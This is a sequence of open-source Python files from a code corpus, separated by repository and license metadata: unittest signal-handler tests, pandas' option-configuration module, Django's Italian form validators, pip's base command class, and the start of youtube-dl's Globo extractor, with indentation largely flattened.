# If our handler has been replaced (is no longer installed) but is
# called by the *new* handler, then it isn't safe to delay the
# SIGINT and we should immediately delegate to the default handler
unittest.installHandler()
handler = signal.getsignal(signal.SIGINT)
def new_handler(frame, signum):
handler(frame, signum)
signal.signal(signal.SIGINT, new_handler)
try:
pid = os.getpid()
os.kill(pid, signal.SIGINT)
except KeyboardInterrupt:
pass
else:
self.fail("replaced but delegated handler doesn't raise interrupt")
def testRunner(self):
# Creating a TextTestRunner with the appropriate argument should
# register the TextTestResult it creates
runner = unittest.TextTestRunner(stream=io.StringIO())
result = runner.run(unittest.TestSuite())
self.assertIn(result, unittest.signals._results)
def testWeakReferences(self):
# Calling registerResult on a result should not keep it alive
result = unittest.TestResult()
unittest.registerResult(result)
ref = weakref.ref(result)
del result
# For non-reference counting implementations
gc.collect();gc.collect()
self.assertIsNone(ref())
def testRemoveResult(self):
result = unittest.TestResult()
unittest.registerResult(result)
unittest.installHandler()
self.assertTrue(unittest.removeResult(result))
# Should this raise an error instead?
self.assertFalse(unittest.removeResult(unittest.TestResult()))
try:
pid = os.getpid()
os.kill(pid, signal.SIGINT)
except KeyboardInterrupt:
pass
self.assertFalse(result.shouldStop)
def testMainInstallsHandler(self):
failfast = object()
test = object()
verbosity = object()
result = object()
default_handler = signal.getsignal(signal.SIGINT)
class FakeRunner(object):
initArgs = []
runArgs = []
def __init__(self, *args, **kwargs):
self.initArgs.append((args, kwargs))
def run(self, test):
self.runArgs.append(test)
return result
class Program(unittest.TestProgram):
def __init__(self, catchbreak):
self.exit = False
self.verbosity = verbosity
self.failfast = failfast
self.catchbreak = catchbreak
self.testRunner = FakeRunner
self.test = test
self.result = None
p = Program(False)
p.runTests()
self.assertEqual(FakeRunner.initArgs, [((), {'buffer': None,
'verbosity': verbosity,
'failfast': failfast,
'warnings': None})])
self.assertEqual(FakeRunner.runArgs, [test])
self.assertEqual(p.result, result)
self.assertEqual(signal.getsignal(signal.SIGINT), default_handler)
FakeRunner.initArgs = []
FakeRunner.runArgs = []
p = Program(True)
p.runTests()
self.assertEqual(FakeRunner.initArgs, [((), {'buffer': None,
'verbosity': verbosity,
'failfast': failfast,
'warnings': None})])
self.assertEqual(FakeRunner.runArgs, [test])
self.assertEqual(p.result, result)
self.assertNotEqual(signal.getsignal(signal.SIGINT), default_handler)
def testRemoveHandler(self):
default_handler = signal.getsignal(signal.SIGINT)
unittest.installHandler()
unittest.removeHandler()
self.assertEqual(signal.getsignal(signal.SIGINT), default_handler)
# check that calling removeHandler multiple times has no ill-effect
unittest.removeHandler()
self.assertEqual(signal.getsignal(signal.SIGINT), default_handler)
def testRemoveHandlerAsDecorator(self):
default_handler = signal.getsignal(signal.SIGINT)
unittest.installHandler()
@unittest.removeHandler
def test():
self.assertEqual(signal.getsignal(signal.SIGINT), default_handler)
test()
self.assertNotEqual(signal.getsignal(signal.SIGINT), default_handler)
| gpl-3.0 |
NixaSoftware/CVis | venv/lib/python2.7/site-packages/pandas/core/config.py | 3 | 23248 | """
The config module holds package-wide configurables and provides
a uniform API for working with them.
Overview
========
This module supports the following requirements:
- options are referenced using keys in dot.notation, e.g. "x.y.option - z".
- keys are case-insensitive.
- functions should accept partial/regex keys, when unambiguous.
- options can be registered by modules at import time.
- options can be registered at init-time (via core.config_init)
- options have a default value, and (optionally) a description and
validation function associated with them.
- options can be deprecated, in which case referencing them
should produce a warning.
- deprecated options can optionally be rerouted to a replacement
so that accessing a deprecated option reroutes to a differently
named option.
- options can be reset to their default value.
- all option can be reset to their default value at once.
- all options in a certain sub - namespace can be reset at once.
- the user can set / get / reset or ask for the description of an option.
- a developer can register and mark an option as deprecated.
- you can register a callback to be invoked when the option value
is set or reset. Changing the stored value is considered misuse, but
is not verboten.
Implementation
==============
- Data is stored using nested dictionaries, and should be accessed
through the provided API.
- "Registered options" and "Deprecated options" have metadata associcated
with them, which are stored in auxilary dictionaries keyed on the
fully-qualified key, e.g. "x.y.z.option".
- the config_init module is imported by the package's __init__.py file.
placing any register_option() calls there will ensure those options
are available as soon as pandas is loaded. If you use register_option
in a module, it will only be available after that module is imported,
which you should be aware of.
- `config_prefix` is a context_manager (for use with the `with` keyword)
which can save developers some typing, see the docstring.
"""
import re
from collections import namedtuple
from contextlib import contextmanager
import warnings
from pandas.compat import map, lmap, u
import pandas.compat as compat
DeprecatedOption = namedtuple('DeprecatedOption', 'key msg rkey removal_ver')
RegisteredOption = namedtuple('RegisteredOption',
'key defval doc validator cb')
_deprecated_options = {}  # holds deprecated option metadata
_registered_options = {}  # holds registered option metadata
_global_config = {} # holds the current values for registered options
_reserved_keys = ['all'] # keys which have a special meaning
class OptionError(AttributeError, KeyError):
"""Exception for pandas.options, backwards compatible with KeyError
checks
"""
#
# User API
def _get_single_key(pat, silent):
keys = _select_options(pat)
if len(keys) == 0:
if not silent:
_warn_if_deprecated(pat)
        raise OptionError('No such key(s): {pat!r}'.format(pat=pat))
if len(keys) > 1:
raise OptionError('Pattern matched multiple keys')
key = keys[0]
if not silent:
_warn_if_deprecated(key)
key = _translate_key(key)
return key
def _get_option(pat, silent=False):
key = _get_single_key(pat, silent)
# walk the nested dict
root, k = _get_root(key)
return root[k]
def _set_option(*args, **kwargs):
    # must have at least 1 arg; deal with constraints later
nargs = len(args)
if not nargs or nargs % 2 != 0:
raise ValueError("Must provide an even number of non-keyword "
"arguments")
# default to false
silent = kwargs.pop('silent', False)
if kwargs:
msg = '_set_option() got an unexpected keyword argument "{kwarg}"'
        raise TypeError(msg.format(kwarg=list(kwargs.keys())[0]))
for k, v in zip(args[::2], args[1::2]):
key = _get_single_key(k, silent)
o = _get_registered_option(key)
if o and o.validator:
o.validator(v)
# walk the nested dict
root, k = _get_root(key)
root[k] = v
if o.cb:
if silent:
with warnings.catch_warnings(record=True):
o.cb(key)
else:
o.cb(key)
def _describe_option(pat='', _print_desc=True):
keys = _select_options(pat)
if len(keys) == 0:
        raise OptionError('No such key(s)')
s = u('')
for k in keys: # filter by pat
s += _build_option_description(k)
if _print_desc:
print(s)
else:
return s
def _reset_option(pat, silent=False):
keys = _select_options(pat)
if len(keys) == 0:
        raise OptionError('No such key(s)')
if len(keys) > 1 and len(pat) < 4 and pat != 'all':
raise ValueError('You must specify at least 4 characters when '
'resetting multiple keys, use the special keyword '
'"all" to reset all the options to their default '
'value')
for k in keys:
_set_option(k, _registered_options[k].defval, silent=silent)
def get_default_val(pat):
key = _get_single_key(pat, silent=True)
return _get_registered_option(key).defval
class DictWrapper(object):
""" provide attribute-style access to a nested dict"""
def __init__(self, d, prefix=""):
object.__setattr__(self, "d", d)
object.__setattr__(self, "prefix", prefix)
def __setattr__(self, key, val):
prefix = object.__getattribute__(self, "prefix")
if prefix:
prefix += "."
prefix += key
# you can't set new keys
        # and you can't overwrite subtrees
if key in self.d and not isinstance(self.d[key], dict):
_set_option(prefix, val)
else:
raise OptionError("You can only set the value of existing options")
def __getattr__(self, key):
prefix = object.__getattribute__(self, "prefix")
if prefix:
prefix += "."
prefix += key
v = object.__getattribute__(self, "d")[key]
if isinstance(v, dict):
return DictWrapper(v, prefix)
else:
return _get_option(prefix)
def __dir__(self):
return list(self.d.keys())
# For user convenience, we'd like to have the available options described
# in the docstring. For dev convenience we'd like to generate the docstrings
# dynamically instead of maintaining them by hand. To this end, we use the
# class below which wraps functions inside a callable, and converts
# __doc__ into a property function. The docstrings below are templates
# using the py2.6+ advanced formatting syntax to plug in a concise list
# of options, and option descriptions.
class CallableDynamicDoc(object):
def __init__(self, func, doc_tmpl):
self.__doc_tmpl__ = doc_tmpl
self.__func__ = func
def __call__(self, *args, **kwds):
return self.__func__(*args, **kwds)
@property
def __doc__(self):
opts_desc = _describe_option('all', _print_desc=False)
opts_list = pp_options_list(list(_registered_options.keys()))
return self.__doc_tmpl__.format(opts_desc=opts_desc,
opts_list=opts_list)
_get_option_tmpl = """
get_option(pat)
Retrieves the value of the specified option.
Available options:
{opts_list}
Parameters
----------
pat : str
Regexp which should match a single option.
Note: partial matches are supported for convenience, but unless you use the
full option name (e.g. x.y.z.option_name), your code may break in future
versions if new options with similar names are introduced.
Returns
-------
result : the value of the option
Raises
------
OptionError : if no such option exists
Notes
-----
The available options with its descriptions:
{opts_desc}
"""
_set_option_tmpl = """
set_option(pat, value)
Sets the value of the specified option.
Available options:
{opts_list}
Parameters
----------
pat : str
Regexp which should match a single option.
Note: partial matches are supported for convenience, but unless you use the
full option name (e.g. x.y.z.option_name), your code may break in future
versions if new options with similar names are introduced.
value :
new value of option.
Returns
-------
None
Raises
------
OptionError if no such option exists
Notes
-----
The available options with its descriptions:
{opts_desc}
"""
_describe_option_tmpl = """
describe_option(pat, _print_desc=False)
Prints the description for one or more registered options.
Call with no arguments to get a listing for all registered options.
Available options:
{opts_list}
Parameters
----------
pat : str
Regexp pattern. All matching keys will have their description displayed.
_print_desc : bool, default True
If True (default) the description(s) will be printed to stdout.
Otherwise, the description(s) will be returned as a unicode string
(for testing).
Returns
-------
None by default, the description(s) as a unicode string if _print_desc
is False
Notes
-----
The available options with its descriptions:
{opts_desc}
"""
_reset_option_tmpl = """
reset_option(pat)
Reset one or more options to their default value.
Pass "all" as argument to reset all options.
Available options:
{opts_list}
Parameters
----------
pat : str/regex
If specified only options matching `prefix*` will be reset.
Note: partial matches are supported for convenience, but unless you
use the full option name (e.g. x.y.z.option_name), your code may break
in future versions if new options with similar names are introduced.
Returns
-------
None
Notes
-----
The available options with its descriptions:
{opts_desc}
"""
# bind the functions with their docstrings into a Callable
# and use that as the functions exposed in pd.api
get_option = CallableDynamicDoc(_get_option, _get_option_tmpl)
set_option = CallableDynamicDoc(_set_option, _set_option_tmpl)
reset_option = CallableDynamicDoc(_reset_option, _reset_option_tmpl)
describe_option = CallableDynamicDoc(_describe_option, _describe_option_tmpl)
options = DictWrapper(_global_config)
#
# Functions for use by pandas developers, in addition to User - api
class option_context(object):
"""
Context manager to temporarily set options in the `with` statement context.
You need to invoke as ``option_context(pat, val, [(pat, val), ...])``.
Examples
--------
>>> with option_context('display.max_rows', 10, 'display.max_columns', 5):
...
"""
def __init__(self, *args):
if not (len(args) % 2 == 0 and len(args) >= 2):
            raise ValueError('Need to invoke as '
'option_context(pat, val, [(pat, val), ...)).')
self.ops = list(zip(args[::2], args[1::2]))
def __enter__(self):
undo = []
for pat, val in self.ops:
undo.append((pat, _get_option(pat, silent=True)))
self.undo = undo
for pat, val in self.ops:
_set_option(pat, val, silent=True)
def __exit__(self, *args):
if self.undo:
for pat, val in self.undo:
_set_option(pat, val, silent=True)
def register_option(key, defval, doc='', validator=None, cb=None):
"""Register an option in the package-wide pandas config object
Parameters
----------
key - a fully-qualified key, e.g. "x.y.option - z".
defval - the default value of the option
doc - a string description of the option
validator - a function of a single argument, should raise `ValueError` if
called with a value which is not a legal value for the option.
cb - a function of a single argument "key", which is called
immediately after an option value is set/reset. key is
the full name of the option.
Returns
-------
Nothing.
Raises
------
ValueError if `validator` is specified and `defval` is not a valid value.
"""
import tokenize
import keyword
key = key.lower()
if key in _registered_options:
msg = "Option '{key}' has already been registered"
raise OptionError(msg.format(key=key))
if key in _reserved_keys:
msg = "Option '{key}' is a reserved key"
raise OptionError(msg.format(key=key))
# the default value should be legal
if validator:
validator(defval)
# walk the nested dict, creating dicts as needed along the path
path = key.split('.')
for k in path:
if not bool(re.match('^' + tokenize.Name + '$', k)):
raise ValueError("{k} is not a valid identifier".format(k=k))
if keyword.iskeyword(k):
raise ValueError("{k} is a python keyword".format(k=k))
cursor = _global_config
msg = "Path prefix to option '{option}' is already an option"
for i, p in enumerate(path[:-1]):
if not isinstance(cursor, dict):
raise OptionError(msg.format(option='.'.join(path[:i])))
if p not in cursor:
cursor[p] = {}
cursor = cursor[p]
if not isinstance(cursor, dict):
raise OptionError(msg.format(option='.'.join(path[:-1])))
cursor[path[-1]] = defval # initialize
# save the option metadata
_registered_options[key] = RegisteredOption(key=key, defval=defval,
doc=doc, validator=validator,
cb=cb)
def deprecate_option(key, msg=None, rkey=None, removal_ver=None):
"""
    Mark option `key` as deprecated. If code attempts to access this option,
a warning will be produced, using `msg` if given, or a default message
if not.
if `rkey` is given, any access to the key will be re-routed to `rkey`.
    Neither the existence of `key` nor that of `rkey` is checked. If they
    do not exist, any subsequent access will fail as usual, after the
deprecation warning is given.
Parameters
----------
key - the name of the option to be deprecated. must be a fully-qualified
option name (e.g "x.y.z.rkey").
msg - (Optional) a warning message to output when the key is referenced.
if no message is given a default message will be emitted.
rkey - (Optional) the name of an option to reroute access to.
If specified, any referenced `key` will be re-routed to `rkey`
including set/get/reset.
rkey must be a fully-qualified option name (e.g "x.y.z.rkey").
used by the default message if no `msg` is specified.
removal_ver - (Optional) specifies the version in which this option will
be removed. used by the default message if no `msg`
is specified.
Returns
-------
Nothing
Raises
------
OptionError - if key has already been deprecated.
"""
key = key.lower()
if key in _deprecated_options:
msg = "Option '{key}' has already been defined as deprecated."
raise OptionError(msg.format(key=key))
_deprecated_options[key] = DeprecatedOption(key, msg, rkey, removal_ver)
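# Minimal sketch (not from the original source) of how the two registration
# helpers above fit together; the option names here are hypothetical and the
# validator is_int is defined near the end of this module:
#
#   register_option("display.fictional_width", 80, doc="example only",
#                   validator=is_int)
#   deprecate_option("display.old_fictional_width",
#                    rkey="display.fictional_width", removal_ver="2.0")
#
# After this, accessing "display.old_fictional_width" warns and re-routes to
# "display.fictional_width".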
#
# functions internal to the module
def _select_options(pat):
"""returns a list of keys matching `pat`
if pat=="all", returns all registered options
"""
# short-circuit for exact key
if pat in _registered_options:
return [pat]
# else look through all of them
keys = sorted(_registered_options.keys())
if pat == 'all': # reserved key
return keys
return [k for k in keys if re.search(pat, k, re.I)]
def _get_root(key):
path = key.split('.')
cursor = _global_config
for p in path[:-1]:
cursor = cursor[p]
return cursor, path[-1]
def _is_deprecated(key):
""" Returns True if the given option has been deprecated """
key = key.lower()
return key in _deprecated_options
def _get_deprecated_option(key):
"""
Retrieves the metadata for a deprecated option, if `key` is deprecated.
Returns
-------
DeprecatedOption (namedtuple) if key is deprecated, None otherwise
"""
try:
d = _deprecated_options[key]
except KeyError:
return None
else:
return d
def _get_registered_option(key):
"""
Retrieves the option metadata if `key` is a registered option.
Returns
-------
RegisteredOption (namedtuple) if key is deprecated, None otherwise
"""
return _registered_options.get(key)
def _translate_key(key):
"""
    if key is deprecated and a replacement key defined, will return the
    replacement key, otherwise returns `key` as-is
"""
d = _get_deprecated_option(key)
if d:
return d.rkey or key
else:
return key
def _warn_if_deprecated(key):
"""
Checks if `key` is a deprecated option and if so, prints a warning.
Returns
-------
bool - True if `key` is deprecated, False otherwise.
"""
d = _get_deprecated_option(key)
if d:
if d.msg:
print(d.msg)
warnings.warn(d.msg, DeprecationWarning)
else:
msg = "'{key}' is deprecated".format(key=key)
if d.removal_ver:
msg += (' and will be removed in {version}'
.format(version=d.removal_ver))
if d.rkey:
msg += ", please use '{rkey}' instead.".format(rkey=d.rkey)
else:
msg += ', please refrain from using it.'
warnings.warn(msg, DeprecationWarning)
return True
return False
def _build_option_description(k):
""" Builds a formatted description of a registered option and prints it """
o = _get_registered_option(k)
d = _get_deprecated_option(k)
s = u('{k} ').format(k=k)
if o.doc:
s += '\n'.join(o.doc.strip().split('\n'))
else:
s += 'No description available.'
if o:
s += (u('\n [default: {default}] [currently: {current}]')
.format(default=o.defval, current=_get_option(k, True)))
if d:
s += u('\n (Deprecated')
s += (u(', use `{rkey}` instead.')
.format(rkey=d.rkey if d.rkey else ''))
s += u(')')
s += '\n\n'
return s
def pp_options_list(keys, width=80, _print=False):
""" Builds a concise listing of available options, grouped by prefix """
from textwrap import wrap
from itertools import groupby
def pp(name, ks):
pfx = ('- ' + name + '.[' if name else '')
ls = wrap(', '.join(ks), width, initial_indent=pfx,
subsequent_indent=' ', break_long_words=False)
if ls and ls[-1] and name:
ls[-1] = ls[-1] + ']'
return ls
ls = []
singles = [x for x in sorted(keys) if x.find('.') < 0]
if singles:
ls += pp('', singles)
keys = [x for x in keys if x.find('.') >= 0]
for k, g in groupby(sorted(keys), lambda x: x[:x.rfind('.')]):
ks = [x[len(k) + 1:] for x in list(g)]
ls += pp(k, ks)
s = '\n'.join(ls)
if _print:
print(s)
else:
return s
#
# helpers
@contextmanager
def config_prefix(prefix):
"""contextmanager for multiple invocations of API with a common prefix
supported API functions: (register / get / set )__option
Warning: This is not thread - safe, and won't work properly if you import
the API functions into your module using the "from x import y" construct.
Example:
import pandas.core.config as cf
with cf.config_prefix("display.font"):
cf.register_option("color", "red")
cf.register_option("size", " 5 pt")
cf.set_option(size, " 6 pt")
cf.get_option(size)
...
etc'
will register options "display.font.color", "display.font.size", set the
value of "display.font.size"... and so on.
"""
# Note: reset_option relies on set_option, and on key directly
# it does not fit in to this monkey-patching scheme
global register_option, get_option, set_option, reset_option
def wrap(func):
def inner(key, *args, **kwds):
pkey = '{prefix}.{key}'.format(prefix=prefix, key=key)
return func(pkey, *args, **kwds)
return inner
_register_option = register_option
_get_option = get_option
_set_option = set_option
set_option = wrap(set_option)
get_option = wrap(get_option)
register_option = wrap(register_option)
yield None
set_option = _set_option
get_option = _get_option
register_option = _register_option
# These factories and methods are handy for use as the validator
# arg in register_option
def is_type_factory(_type):
"""
Parameters
----------
`_type` - a type to be compared against (e.g. type(x) == `_type`)
Returns
-------
validator - a function of a single argument x , which raises
ValueError if type(x) is not equal to `_type`
"""
def inner(x):
if type(x) != _type:
msg = "Value must have type '{typ!s}'"
raise ValueError(msg.format(typ=_type))
return inner
def is_instance_factory(_type):
"""
Parameters
----------
`_type` - the type to be checked against
Returns
-------
validator - a function of a single argument x , which raises
ValueError if x is not an instance of `_type`
"""
if isinstance(_type, (tuple, list)):
_type = tuple(_type)
from pandas.io.formats.printing import pprint_thing
type_repr = "|".join(map(pprint_thing, _type))
else:
type_repr = "'{typ}'".format(typ=_type)
def inner(x):
if not isinstance(x, _type):
msg = "Value must be an instance of {type_repr}"
raise ValueError(msg.format(type_repr=type_repr))
return inner
def is_one_of_factory(legal_values):
callables = [c for c in legal_values if callable(c)]
legal_values = [c for c in legal_values if not callable(c)]
def inner(x):
from pandas.io.formats.printing import pprint_thing as pp
if x not in legal_values:
if not any([c(x) for c in callables]):
pp_values = pp("|".join(lmap(pp, legal_values)))
msg = "Value must be one of {pp_values}"
if len(callables):
msg += " or a callable"
raise ValueError(msg.format(pp_values=pp_values))
return inner
# common type validators, for convenience
# usage: register_option(... , validator = is_int)
is_int = is_type_factory(int)
is_bool = is_type_factory(bool)
is_float = is_type_factory(float)
is_str = is_type_factory(str)
is_unicode = is_type_factory(compat.text_type)
is_text = is_instance_factory((str, bytes))
def is_callable(obj):
"""
Parameters
----------
`obj` - the object to be checked
Returns
-------
validator - returns True if object is callable
raises ValueError otherwise.
"""
if not callable(obj):
raise ValueError("Value must be a callable")
return True
| apache-2.0 |
zakuro9715/lettuce | tests/integration/lib/Django-1.2.5/django/contrib/localflavor/it/forms.py | 273 | 3027 | """
IT-specific Form helpers
"""
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import Field, RegexField, Select
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import smart_unicode
from django.contrib.localflavor.it.util import ssn_check_digit, vat_number_check_digit
import re
class ITZipCodeField(RegexField):
default_error_messages = {
'invalid': _('Enter a valid zip code.'),
}
def __init__(self, *args, **kwargs):
super(ITZipCodeField, self).__init__(r'^\d{5}$',
max_length=None, min_length=None, *args, **kwargs)
class ITRegionSelect(Select):
"""
A Select widget that uses a list of IT regions as its choices.
"""
def __init__(self, attrs=None):
from it_region import REGION_CHOICES
super(ITRegionSelect, self).__init__(attrs, choices=REGION_CHOICES)
class ITProvinceSelect(Select):
"""
A Select widget that uses a list of IT provinces as its choices.
"""
def __init__(self, attrs=None):
from it_province import PROVINCE_CHOICES
super(ITProvinceSelect, self).__init__(attrs, choices=PROVINCE_CHOICES)
class ITSocialSecurityNumberField(RegexField):
"""
A form field that validates Italian Social Security numbers (codice fiscale).
For reference see http://www.agenziaentrate.it/ and search for
'Informazioni sulla codificazione delle persone fisiche'.
"""
default_error_messages = {
'invalid': _(u'Enter a valid Social Security number.'),
}
def __init__(self, *args, **kwargs):
super(ITSocialSecurityNumberField, self).__init__(r'^\w{3}\s*\w{3}\s*\w{5}\s*\w{5}$',
max_length=None, min_length=None, *args, **kwargs)
def clean(self, value):
value = super(ITSocialSecurityNumberField, self).clean(value)
if value in EMPTY_VALUES:
return u''
value = re.sub('\s', u'', value).upper()
try:
check_digit = ssn_check_digit(value)
except ValueError:
raise ValidationError(self.error_messages['invalid'])
if not value[15] == check_digit:
raise ValidationError(self.error_messages['invalid'])
return value
class ITVatNumberField(Field):
"""
A form field that validates Italian VAT numbers (partita IVA).
"""
default_error_messages = {
'invalid': _(u'Enter a valid VAT number.'),
}
def clean(self, value):
value = super(ITVatNumberField, self).clean(value)
if value in EMPTY_VALUES:
return u''
try:
vat_number = int(value)
except ValueError:
raise ValidationError(self.error_messages['invalid'])
vat_number = str(vat_number).zfill(11)
check_digit = vat_number_check_digit(vat_number[0:10])
if not vat_number[10] == check_digit:
raise ValidationError(self.error_messages['invalid'])
return smart_unicode(vat_number)
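# Illustrative usage sketch (not part of the original Django source); it
# assumes a configured Django 1.2 project so that form and translation
# machinery are available:
#
#     >>> ITZipCodeField().clean(u'00100')            # five digits -> accepted
#     u'00100'
#     >>> ITZipCodeField().clean(u'123')               # raises ValidationError
#     >>> ITVatNumberField(required=False).clean(u'')  # empty normalises to u''
#     u''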
| gpl-3.0 |
nitin-cherian/LifeLongLearning | Python/Experiments/JINJA/RealPython/jinja_env/lib/python3.5/site-packages/pip/basecommand.py | 341 | 11910 | """Base Command class, and related routines"""
from __future__ import absolute_import
import logging
import os
import sys
import optparse
import warnings
from pip import cmdoptions
from pip.index import PackageFinder
from pip.locations import running_under_virtualenv
from pip.download import PipSession
from pip.exceptions import (BadCommand, InstallationError, UninstallationError,
CommandError, PreviousBuildDirError)
from pip.compat import logging_dictConfig
from pip.baseparser import ConfigOptionParser, UpdatingDefaultsHelpFormatter
from pip.req import InstallRequirement, parse_requirements
from pip.status_codes import (
SUCCESS, ERROR, UNKNOWN_ERROR, VIRTUALENV_NOT_FOUND,
PREVIOUS_BUILD_DIR_ERROR,
)
from pip.utils import deprecation, get_prog, normalize_path
from pip.utils.logging import IndentingFormatter
from pip.utils.outdated import pip_version_check
__all__ = ['Command']
logger = logging.getLogger(__name__)
class Command(object):
name = None
usage = None
hidden = False
log_streams = ("ext://sys.stdout", "ext://sys.stderr")
def __init__(self, isolated=False):
parser_kw = {
'usage': self.usage,
'prog': '%s %s' % (get_prog(), self.name),
'formatter': UpdatingDefaultsHelpFormatter(),
'add_help_option': False,
'name': self.name,
'description': self.__doc__,
'isolated': isolated,
}
self.parser = ConfigOptionParser(**parser_kw)
# Commands should add options to this option group
optgroup_name = '%s Options' % self.name.capitalize()
self.cmd_opts = optparse.OptionGroup(self.parser, optgroup_name)
# Add the general options
gen_opts = cmdoptions.make_option_group(
cmdoptions.general_group,
self.parser,
)
self.parser.add_option_group(gen_opts)
def _build_session(self, options, retries=None, timeout=None):
session = PipSession(
cache=(
normalize_path(os.path.join(options.cache_dir, "http"))
if options.cache_dir else None
),
retries=retries if retries is not None else options.retries,
insecure_hosts=options.trusted_hosts,
)
# Handle custom ca-bundles from the user
if options.cert:
session.verify = options.cert
# Handle SSL client certificate
if options.client_cert:
session.cert = options.client_cert
# Handle timeouts
if options.timeout or timeout:
session.timeout = (
timeout if timeout is not None else options.timeout
)
# Handle configured proxies
if options.proxy:
session.proxies = {
"http": options.proxy,
"https": options.proxy,
}
# Determine if we can prompt the user for authentication or not
session.auth.prompting = not options.no_input
return session
def parse_args(self, args):
# factored out for testability
return self.parser.parse_args(args)
def main(self, args):
options, args = self.parse_args(args)
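        # Map the -q/-v counts onto a console log level: the intended mapping
        # is one -q -> WARNING, two -> ERROR, three or more -> CRITICAL, while
        # -v enables DEBUG and the default is INFO.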
if options.quiet:
if options.quiet == 1:
level = "WARNING"
            elif options.quiet == 2:
level = "ERROR"
else:
level = "CRITICAL"
elif options.verbose:
level = "DEBUG"
else:
level = "INFO"
# The root logger should match the "console" level *unless* we
# specified "--log" to send debug logs to a file.
root_level = level
if options.log:
root_level = "DEBUG"
logging_dictConfig({
"version": 1,
"disable_existing_loggers": False,
"filters": {
"exclude_warnings": {
"()": "pip.utils.logging.MaxLevelFilter",
"level": logging.WARNING,
},
},
"formatters": {
"indent": {
"()": IndentingFormatter,
"format": "%(message)s",
},
},
"handlers": {
"console": {
"level": level,
"class": "pip.utils.logging.ColorizedStreamHandler",
"stream": self.log_streams[0],
"filters": ["exclude_warnings"],
"formatter": "indent",
},
"console_errors": {
"level": "WARNING",
"class": "pip.utils.logging.ColorizedStreamHandler",
"stream": self.log_streams[1],
"formatter": "indent",
},
"user_log": {
"level": "DEBUG",
"class": "pip.utils.logging.BetterRotatingFileHandler",
"filename": options.log or "/dev/null",
"delay": True,
"formatter": "indent",
},
},
"root": {
"level": root_level,
"handlers": list(filter(None, [
"console",
"console_errors",
"user_log" if options.log else None,
])),
},
# Disable any logging besides WARNING unless we have DEBUG level
# logging enabled. These use both pip._vendor and the bare names
# for the case where someone unbundles our libraries.
"loggers": dict(
(
name,
{
"level": (
"WARNING"
if level in ["INFO", "ERROR"]
else "DEBUG"
),
},
)
for name in ["pip._vendor", "distlib", "requests", "urllib3"]
),
})
if sys.version_info[:2] == (2, 6):
warnings.warn(
"Python 2.6 is no longer supported by the Python core team, "
"please upgrade your Python. A future version of pip will "
"drop support for Python 2.6",
deprecation.Python26DeprecationWarning
)
# TODO: try to get these passing down from the command?
# without resorting to os.environ to hold these.
if options.no_input:
os.environ['PIP_NO_INPUT'] = '1'
if options.exists_action:
os.environ['PIP_EXISTS_ACTION'] = ' '.join(options.exists_action)
if options.require_venv:
# If a venv is required check if it can really be found
if not running_under_virtualenv():
logger.critical(
'Could not find an activated virtualenv (required).'
)
sys.exit(VIRTUALENV_NOT_FOUND)
try:
status = self.run(options, args)
# FIXME: all commands should return an exit status
# and when it is done, isinstance is not needed anymore
if isinstance(status, int):
return status
except PreviousBuildDirError as exc:
logger.critical(str(exc))
logger.debug('Exception information:', exc_info=True)
return PREVIOUS_BUILD_DIR_ERROR
except (InstallationError, UninstallationError, BadCommand) as exc:
logger.critical(str(exc))
logger.debug('Exception information:', exc_info=True)
return ERROR
except CommandError as exc:
logger.critical('ERROR: %s', exc)
logger.debug('Exception information:', exc_info=True)
return ERROR
except KeyboardInterrupt:
logger.critical('Operation cancelled by user')
logger.debug('Exception information:', exc_info=True)
return ERROR
except:
logger.critical('Exception:', exc_info=True)
return UNKNOWN_ERROR
finally:
# Check if we're using the latest version of pip available
if (not options.disable_pip_version_check and not
getattr(options, "no_index", False)):
with self._build_session(
options,
retries=0,
timeout=min(5, options.timeout)) as session:
pip_version_check(session)
return SUCCESS
class RequirementCommand(Command):
@staticmethod
def populate_requirement_set(requirement_set, args, options, finder,
session, name, wheel_cache):
"""
Marshal cmd line args into a requirement set.
"""
for filename in options.constraints:
for req in parse_requirements(
filename,
constraint=True, finder=finder, options=options,
session=session, wheel_cache=wheel_cache):
requirement_set.add_requirement(req)
for req in args:
requirement_set.add_requirement(
InstallRequirement.from_line(
req, None, isolated=options.isolated_mode,
wheel_cache=wheel_cache
)
)
for req in options.editables:
requirement_set.add_requirement(
InstallRequirement.from_editable(
req,
default_vcs=options.default_vcs,
isolated=options.isolated_mode,
wheel_cache=wheel_cache
)
)
found_req_in_file = False
for filename in options.requirements:
for req in parse_requirements(
filename,
finder=finder, options=options, session=session,
wheel_cache=wheel_cache):
found_req_in_file = True
requirement_set.add_requirement(req)
# If --require-hashes was a line in a requirements file, tell
# RequirementSet about it:
requirement_set.require_hashes = options.require_hashes
if not (args or options.editables or found_req_in_file):
opts = {'name': name}
if options.find_links:
msg = ('You must give at least one requirement to '
'%(name)s (maybe you meant "pip %(name)s '
'%(links)s"?)' %
dict(opts, links=' '.join(options.find_links)))
else:
msg = ('You must give at least one requirement '
'to %(name)s (see "pip help %(name)s")' % opts)
logger.warning(msg)
def _build_package_finder(self, options, session,
platform=None, python_versions=None,
abi=None, implementation=None):
"""
Create a package finder appropriate to this requirement command.
"""
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.debug('Ignoring indexes: %s', ','.join(index_urls))
index_urls = []
return PackageFinder(
find_links=options.find_links,
format_control=options.format_control,
index_urls=index_urls,
trusted_hosts=options.trusted_hosts,
allow_all_prereleases=options.pre,
process_dependency_links=options.process_dependency_links,
session=session,
platform=platform,
versions=python_versions,
abi=abi,
implementation=implementation,
)
| mit |
fluks/youtube-dl | youtube_dl/extractor/globo.py | 22 | 19393 | # coding: utf-8
from __future__ import unicode_literals
import random
import math
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_chr,
compat_ord,
)
from ..utils import (
ExtractorError,
float_or_none,
)
class GloboIE(InfoExtractor):
_VALID_URL = 'https?://.+?\.globo\.com/(?P<id>.+)'
_API_URL_TEMPLATE = 'http://api.globovideos.com/videos/%s/playlist'
_SECURITY_URL_TEMPLATE = 'http://security.video.globo.com/videos/%s/hash?player=flash&version=2.9.9.50&resource_id=%s'
_VIDEOID_REGEXES = [
r'\bdata-video-id="(\d+)"',
r'\bdata-player-videosids="(\d+)"',
r'<div[^>]+\bid="(\d+)"',
]
_RESIGN_EXPIRATION = 86400
_TESTS = [
{
'url': 'http://globotv.globo.com/sportv/futebol-nacional/v/os-gols-de-atletico-mg-3-x-2-santos-pela-24a-rodada-do-brasileirao/3654973/',
'md5': '03ebf41cb7ade43581608b7d9b71fab0',
'info_dict': {
'id': '3654973',
